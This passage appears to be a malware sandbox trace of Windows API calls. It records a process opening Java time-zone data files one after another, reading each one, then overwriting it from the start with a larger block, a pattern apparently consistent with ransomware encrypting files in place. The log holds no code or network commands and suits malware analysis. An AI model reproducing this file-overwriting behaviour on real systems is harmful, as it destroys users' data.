WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.040] ReleaseMutex (hMutex=0x168) returned 1 [0141.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Monaco", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0141.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Monaco", cchWideChar=6, lpMultiByteStr=0x1f7ad2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Monaco", lpUsedDefaultChar=0x0) returned 6 [0141.041] ReadFile (in: hFile=0x204, lpBuffer=0x26cf048, nNumberOfBytesToRead=0x628, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesRead=0x2fdf2bc*=0x628, lpOverlapped=0x0) returned 1 [0141.052] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0141.053] WriteFile (in: hFile=0x204, lpBuffer=0x2870fb8*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870fb8*, lpNumberOfBytesWritten=0x2fdf2d0*=0xbb0, lpOverlapped=0x0) returned 1 [0141.053] CloseHandle (hObject=0x204) returned 1 [0141.053] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Simferopol" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\simferopol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0141.059] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0141.059] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x428 [0141.060] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0141.060] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.072] ReleaseMutex (hMutex=0x168) returned 1 [0141.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Simferopol", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0141.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Simferopol", cchWideChar=10, lpMultiByteStr=0x1f7346c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Simferopol", lpUsedDefaultChar=0x0) returned 10 [0141.072] ReadFile (in: hFile=0x204, lpBuffer=0x269cae8, nNumberOfBytesToRead=0x428, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x269cae8*, lpNumberOfBytesRead=0x2fdf2bc*=0x428, lpOverlapped=0x0) returned 1 [0141.091] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0141.091] WriteFile (in: hFile=0x204, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9b0, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x9b0, lpOverlapped=0x0) returned 1 [0141.091] CloseHandle (hObject=0x204) returned 1 [0141.091] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vilnius" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\vilnius"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0141.098] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0141.098] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x424 [0141.098] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0141.098] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.112] ReleaseMutex (hMutex=0x168) returned 1 [0141.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Vilnius", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0141.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Vilnius", cchWideChar=7, lpMultiByteStr=0x1f7ad2c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Vilnius", lpUsedDefaultChar=0x0) returned 7 [0141.112] ReadFile (in: hFile=0x204, lpBuffer=0x269cae8, nNumberOfBytesToRead=0x424, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x269cae8*, lpNumberOfBytesRead=0x2fdf2bc*=0x424, lpOverlapped=0x0) returned 1 [0141.118] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0141.118] WriteFile (in: hFile=0x204, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9ac, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x9ac, lpOverlapped=0x0) returned 1 [0141.118] CloseHandle (hObject=0x204) returned 1 [0141.118] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Chagos" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\chagos"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0141.156] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0141.157] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4d [0141.157] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0141.157] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.157] ReleaseMutex (hMutex=0x168) returned 1 [0141.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Chagos", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0141.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Chagos", cchWideChar=6, lpMultiByteStr=0x1f7ad2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Chagos", lpUsedDefaultChar=0x0) returned 6 [0141.157] ReadFile (in: hFile=0x204, lpBuffer=0x1f9fc48, nNumberOfBytesToRead=0x4d, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f9fc48*, lpNumberOfBytesRead=0x2fdf2bc*=0x4d, lpOverlapped=0x0) returned 1 [0141.158] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0141.158] WriteFile (in: hFile=0x204, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x5d5, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5d5, lpOverlapped=0x0) returned 1 [0141.159] CloseHandle (hObject=0x204) returned 1 [0141.159] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mayotte" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\mayotte"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0141.160] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0141.160] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x41 [0141.160] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0141.160] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.160] ReleaseMutex (hMutex=0x168) returned 1 [0141.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mayotte", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0141.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mayotte", cchWideChar=7, lpMultiByteStr=0x1f7ad2c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Mayotte", lpUsedDefaultChar=0x0) returned 7 [0141.160] ReadFile (in: hFile=0x204, lpBuffer=0x1fc1f08, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc1f08*, lpNumberOfBytesRead=0x2fdf2bc*=0x41, lpOverlapped=0x0) returned 1 [0141.161] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0141.161] WriteFile (in: hFile=0x204, lpBuffer=0x1effa98*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1effa98*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0141.162] CloseHandle (hObject=0x204) returned 1 [0141.162] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Chuuk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\chuuk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0141.166] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0141.166] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x41 [0141.166] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0141.166] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.167] ReleaseMutex (hMutex=0x168) returned 1 [0141.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Chuuk", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Chuuk", cchWideChar=5, lpMultiByteStr=0x1f7ad2c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Chuuk", lpUsedDefaultChar=0x0) returned 5 [0141.167] ReadFile (in: hFile=0x1cc, lpBuffer=0x1fc1f08, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc1f08*, lpNumberOfBytesRead=0x2fdf2bc*=0x41, lpOverlapped=0x0) returned 1 [0141.168] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0141.168] WriteFile (in: hFile=0x1cc, lpBuffer=0x1effa98*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1effa98*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0141.169] CloseHandle (hObject=0x1cc) returned 1 [0141.169] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Gambier" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\gambier"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0141.170] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0141.170] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x41 [0141.170] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0141.170] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.170] ReleaseMutex (hMutex=0x168) returned 1 [0141.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Gambier", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0141.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Gambier", cchWideChar=7, lpMultiByteStr=0x1f7ad2c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Gambier", lpUsedDefaultChar=0x0) returned 7 [0141.171] ReadFile (in: hFile=0x1cc, lpBuffer=0x1fc1f08, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc1f08*, lpNumberOfBytesRead=0x2fdf2bc*=0x41, lpOverlapped=0x0) returned 1 [0141.172] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0141.172] WriteFile (in: hFile=0x1cc, lpBuffer=0x1effa98*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1effa98*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0141.172] CloseHandle (hObject=0x1cc) returned 1 [0141.173] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Majuro" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\majuro"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0141.174] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0141.174] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4d [0141.174] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0141.174] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.174] ReleaseMutex (hMutex=0x168) returned 1 [0141.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Majuro", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0141.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Majuro", cchWideChar=6, lpMultiByteStr=0x1f7ad2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Majuro", lpUsedDefaultChar=0x0) returned 6 [0141.175] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f9fc48, nNumberOfBytesToRead=0x4d, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f9fc48*, lpNumberOfBytesRead=0x2fdf2bc*=0x4d, lpOverlapped=0x0) returned 1 [0141.176] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0141.176] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5d5, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5d5, lpOverlapped=0x0) returned 1 [0141.176] CloseHandle (hObject=0x1cc) returned 1 [0141.176] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Palau" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\palau"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0141.177] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0141.178] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x41 [0141.178] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0141.178] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.178] ReleaseMutex (hMutex=0x168) returned 1 [0141.178] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Palau", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.178] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Palau", cchWideChar=5, lpMultiByteStr=0x1f7ad2c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Palau", lpUsedDefaultChar=0x0) returned 5 [0141.178] ReadFile (in: hFile=0x1cc, lpBuffer=0x1fc1f08, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc1f08*, lpNumberOfBytesRead=0x2fdf2bc*=0x41, lpOverlapped=0x0) returned 1 [0141.180] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0141.180] WriteFile (in: hFile=0x1cc, lpBuffer=0x1effa98*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1effa98*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0141.180] CloseHandle (hObject=0x1cc) returned 1 [0141.180] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Tongatapu" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\tongatapu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0141.181] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0141.182] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x85 [0141.182] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0141.182] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.182] ReleaseMutex (hMutex=0x168) returned 1 [0141.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tongatapu", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tongatapu", cchWideChar=9, lpMultiByteStr=0x1f7328c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tongatapu", lpUsedDefaultChar=0x0) returned 9 [0141.182] ReadFile (in: hFile=0x1cc, lpBuffer=0x2673178, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673178*, lpNumberOfBytesRead=0x2fdf2bc*=0x85, lpOverlapped=0x0) returned 1 [0141.183] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0141.183] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x60d, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2fdf2d0*=0x60d, lpOverlapped=0x0) returned 1 [0141.184] CloseHandle (hObject=0x1cc) returned 1 [0141.184] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\EST5" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\est5"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0141.185] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0141.185] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1b [0141.185] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0141.185] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.185] ReleaseMutex (hMutex=0x168) returned 1 [0141.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EST5", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0141.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EST5", cchWideChar=4, lpMultiByteStr=0x1f7ad2c, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EST5", lpUsedDefaultChar=0x0) returned 4 [0141.186] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f88bc8, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88bc8*, lpNumberOfBytesRead=0x2fdf2bc*=0x1b, lpOverlapped=0x0) returned 1 [0141.187] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0141.187] WriteFile (in: hFile=0x1cc, lpBuffer=0x1effa98*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1effa98*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0141.187] CloseHandle (hObject=0x1cc) returned 1 [0141.188] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\YST9YDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\yst9ydt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0147.622] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0147.622] 